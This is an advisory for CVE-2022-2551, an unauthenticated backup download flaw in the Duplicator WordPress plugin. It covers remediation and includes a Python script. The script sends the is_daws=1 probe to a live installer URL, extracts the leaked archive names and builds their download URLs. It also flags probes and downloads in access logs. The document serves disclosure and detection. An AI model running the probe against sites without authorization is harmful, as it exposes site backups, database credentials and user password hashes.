WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download

Duplicator 1.4.6 (and all versions up to and including 1.4.7) contains a critical unauthenticated backup download vulnerability, tracked as CVE-2022-2551. The flaw allows remote, unauthenticated attackers to discover and download full site backups, which typically contain sensitive information such as database exports, user details, and core configuration files.

Understanding the Vulnerability (CVE-2022-2551)

The leak occurs when an attacker requests the main.installer.php file with the is_daws=1 parameter. If an administrator has run the installer script at least once, the source of the response contains the randomized filename of the backup archive, which is located in the same directory as the installer. Because that directory is web-accessible, knowing the filename is enough to download the archive without any authentication.

A full site backup is essentially the "keys to the kingdom." An attacker who downloads it gains access to:

- Database contents: the user tables (usernames, hashed passwords, email addresses) and proprietary business data.
- Configuration files: wp-config.php reveals the database credentials and the authentication salts.
- Server details: information about the server environment and file paths, which can be used for further reconnaissance or targeted attacks.

Remediation and Protection

If you are running Duplicator 1.4.7 or earlier, immediate action is required to secure your site. Update to a release later than 1.4.7, and remove any backup archives and installer files left behind in the web root, since the plugin's patch does not retroactively protect files that are already exposed. If there is any chance a backup was downloaded, treat its contents as compromised: rotate the database credentials and authentication salts in wp-config.php and reset user passwords, because the password hashes are now in the attacker's hands.
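The following Python script is an added example; it is not code from the original advisory or from the Duplicator project. It shows the two checks a practitioner wants around this disclosure: an offline parser that pulls the leaked archive name out of an installer response and resolves it to a download URL next to the installer (the page only names main.installer.php and the is_daws=1 parameter, so the installer URL is supplied by the caller, and the archive-name pattern, ending in _archive.zip or _archive.daf, is an assumption), plus a filter that flags exploitation attempts in web-server access logs. The sample response body and log lines are constructed, not real captures.

```python
import re
import urllib.request
from urllib.parse import urljoin, urlsplit, parse_qs

# Archive filename as it appears in the installer's page source. Assumption:
# Duplicator names its archives <prefix>_archive.zip or <prefix>_archive.daf.
ARCHIVE_RE = re.compile(r'\b([A-Za-z0-9_.-]+_archive\.(?:zip|daf))\b')


def extract_archive_names(html):
    """Return the distinct backup archive names found in a response body."""
    names = []
    for name in ARCHIVE_RE.findall(html):
        if name not in names:
            names.append(name)
    return names


def probe_url(installer_url):
    """The installer URL with the is_daws=1 parameter the advisory describes."""
    sep = '&' if urlsplit(installer_url).query else '?'
    return installer_url + sep + 'is_daws=1'


def archive_urls(installer_url, names):
    """The archive sits in the installer's directory, so resolve relative to it."""
    return [urljoin(installer_url, name) for name in names]


def check_site(installer_url, timeout=10):
    """Live check (network): fetch the probe URL and return leaked archive URLs.

    installer_url is the full URL of main.installer.php on the target; the
    advisory does not give the directory, so the caller must supply it.
    """
    req = urllib.request.Request(
        probe_url(installer_url), headers={'User-Agent': 'cve-2022-2551-check'})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode('utf-8', 'replace')
    return archive_urls(installer_url, extract_archive_names(body))


# Detection side: flag probes and archive downloads in a combined-format log.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def flag_log_line(line):
    """Classify one access-log line; returns a label or None if uninteresting."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if target.path.endswith('/main.installer.php') and 'is_daws' in parse_qs(target.query):
        return 'installer-probe'
    if ARCHIVE_RE.search(target.path):
        return 'archive-download'
    return None


def scan_log(lines):
    """Return (label, line) pairs for every line that deserves analyst attention."""
    hits = []
    for line in lines:
        label = flag_log_line(line)
        if label:
            hits.append((label, line))
    return hits


# Constructed sample data so the script runs offline (not a real capture).
SAMPLE_RESPONSE = (
    '<html><body><script>\n'
    'var archiveName = "20220803_example_0123456789abcdef0123456789abcdef'
    '_20220803101500_archive.zip";\n'
    '</script></body></html>'
)
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Aug/2022:10:15:00 +0000] "GET /wp-content/backups-dup-lite/'
    'dup-installer/main.installer.php?is_daws=1 HTTP/1.1" 200 5120 "-" "curl/7.83"',
    '203.0.113.7 - - [03/Aug/2022:10:15:02 +0000] "GET /wp-content/backups-dup-lite/'
    'dup-installer/20220803_example_0123456789abcdef0123456789abcdef'
    '_20220803101500_archive.zip HTTP/1.1" 200 83886080 "-" "curl/7.83"',
    '198.51.100.4 - - [03/Aug/2022:10:16:00 +0000] "GET /wp-login.php HTTP/1.1" '
    '200 1800 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    installer = 'https://example.com/wp-content/backups-dup-lite/dup-installer/main.installer.php'
    print('probe:', probe_url(installer))
    for url in archive_urls(installer, extract_archive_names(SAMPLE_RESPONSE)):
        print('leaked archive:', url)
    for label, line in scan_log(SAMPLE_LOG):
        print(label, '<-', line.split('"')[1])
```

Run check_site only against sites you are authorized to test; a non-empty result means installer files are still reachable in the web root and the archive should be removed immediately, not just the plugin updated. On the defensive side, an installer-probe followed within seconds by an archive-download from the same address, as in the constructed log above, is the signature to alert on; a probe alone is reconnaissance, the download is the breach.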